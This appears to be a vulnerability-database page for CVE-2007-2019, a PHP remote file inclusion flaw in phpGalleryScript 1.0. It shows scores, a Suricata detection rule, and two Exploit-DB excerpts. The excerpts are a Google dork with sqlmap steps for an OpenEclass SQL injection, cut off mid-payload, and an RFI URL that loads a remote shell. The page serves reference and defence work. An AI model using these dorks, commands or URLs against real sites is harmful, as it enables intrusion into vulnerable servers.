CVE-2007-2019
published 2007-04-12CVE-2007-2019: PHP remote file inclusion vulnerability in init.gallery.php in phpGalleryScript 1.0 allows remote attackers to execute arbitrary PHP code via a URL in the…
PriorityP344high7.5CVSS 2.0
AVNACLAuNCPIPAP
EXPLOIT
EPSS
3.17%
86.4th percentile
PHP remote file inclusion vulnerability in init.gallery.php in phpGalleryScript 1.0 allows remote attackers to execute arbitrary PHP code via a URL in the include_class parameter.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| tomex | phpgalleryscript | — | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
Suricata
GPL IMAP login buffer overflow attempt
suricata·2010-09-23
CVE-1999-0005 GPL IMAP login buffer overflow attempt
GPL IMAP login buffer overflow attempt
Rule: alert tcp $EXTERNAL_NET any -> $HOME_NET 143 (msg:"GPL IMAP login buffer overflow attempt"; flow:established,to_server; content:"LOGIN"; isdataat:100,relative; pcre:"/\sLOGIN\s[^\n]{100}/smi"; reference:bugtraq,13727; reference:bugtraq,502; reference:cve,1999-0005; reference:cve,1999-1557; reference:cve,2005-1255; reference:nessus,10123; reference:cve,2007-2795; reference:nessus,10125; classtype:attempted-user; sid:2101842; rev:16; metadata:created_at 2010_09_23, cve CVE_1999_0005, confidence High, signature_severity Major, updated_at 2019_07_26;)
Exploit-DB
GUnet OpenEclass E-learning platform 1.7.3 - 'uname' SQL Injection
exploitdb·2020-02-24
GUnet OpenEclass E-learning platform 1.7.3 - 'uname' SQL Injection
GUnet OpenEclass E-learning platform 1.7.3 - 'uname' SQL Injection
---
# Exploit Title: GUnet OpenEclass E-learning platform 1.7.3 - 'uname' SQL Injection
# Google Dork: intext:"© GUnet 2003-2007"
# Date: 2019-11-03
# Exploit Author: emaragkos
# Vendor Homepage: https://www.openeclass.org/
# Software Link: http://download.openeclass.org/files/1.7/eclass-1.7.3.tar.gz
# Version: 1.7.3 (2007)
# Tested on: Ubuntu 12 (Apache 2.2.22, PHP 5.3.10, MySQL 5.5.38)
# CVE : -
# GUnet OpenEclass Copy to file -> Save as eclasstestlogin)
4) Load the file to SQLMap with the use of -r parameter
sqlmap -r eclasstestlogin --level=5 --risk=3 -v
SQLMap will find the following payload
---
Parameter: uname (POST)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: uname=te
Exploit-DB
PHPGalleryScript 1.0 - 'init.gallery.php?include_class' Remote File Inclusion
exploitdb·2007-04-10
CVE-2007-2019 PHPGalleryScript 1.0 - 'init.gallery.php?include_class' Remote File Inclusion
PHPGalleryScript 1.0 - 'init.gallery.php?include_class' Remote File Inclusion
---
vendor url: http://tomex.org/
http://[victim]/php/init.gallery.php?include_class=[SHELL DIRECTORY]/something
# milw0rm.com [2007-04-10]
No writeups or analysis indexed.
http://osvdb.org/34811http://secunia.com/advisories/24860http://securityreason.com/securityalert/2566http://www.attrition.org/pipermail/vim/2007-April/001501.htmlhttp://www.securityfocus.com/archive/1/465200/100/0/threadedhttp://www.vupen.com/english/advisories/2007/1334https://exchange.xforce.ibmcloud.com/vulnerabilities/33545http://osvdb.org/34811http://secunia.com/advisories/24860http://securityreason.com/securityalert/2566http://www.attrition.org/pipermail/vim/2007-April/001501.htmlhttp://www.securityfocus.com/archive/1/465200/100/0/threadedhttp://www.vupen.com/english/advisories/2007/1334https://exchange.xforce.ibmcloud.com/vulnerabilities/33545
2007-04-12
Published